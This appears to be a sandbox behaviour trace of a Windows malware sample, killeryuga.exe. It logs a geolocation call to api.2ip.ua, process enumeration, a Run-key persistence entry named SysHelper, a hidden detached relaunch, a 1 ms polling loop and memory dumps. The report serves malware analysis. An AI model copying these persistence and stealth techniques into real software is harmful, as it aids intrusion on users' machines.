Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Mutex Create mutex_name = {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, os_pid = 0x7a0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window Create window_name = LPCWSTRszTitle, class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Thread 0x7a8
861 0
Category Operation Information Success Count Logfile
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
(The two entries above alternate throughout this part of the trace: 309 Process Open calls and 308 System Sleep calls, every one with the same arguments and the same result, i.e. a tight loop that opens a process handle with SYNCHRONIZE access, sleeps 1 ms, and repeats.)
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
Process #19: killeryuga.exe
Information Value
ID #19
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:27, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x5a4
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x590
0x7B8
0x790
0x78C
0x464
0x7F4
0x454
0x7E0
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x008F43B0 0x00923716 Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00437D77, 0x0040D690, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00420C00 False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\temporary internet files\content.ie5\index.dat 32.00 KB
MD5: ec386329eb6df438bfe57a573c340458
SHA1: 2a1cba6fecb1ffe38e8d6f649835c75e536f1aa4
SHA256: 65e3bb2968cfee7da74f2e619e60d44387eaa91acd34be75db9044012cc7a7ac
SSDeep: 3:qRFiJ2totWIltvl3sl5llwcugxmZhlldMBGlOnO/tld/txRt/r/i//llevRR//:qjyxEFpc5O+L1ji1IRX
YARA Match: False
c:\users\5p5nrg~1\appdata\local\temp\cookies\index.dat 16.00 KB
MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA1: 15740b197555ba8e162c37a60ba655151e3bebae
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
SSDeep: 3:qRFiJ2totWIlXllll:qjyx
YARA Match: False
Threads
Thread 0x590
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
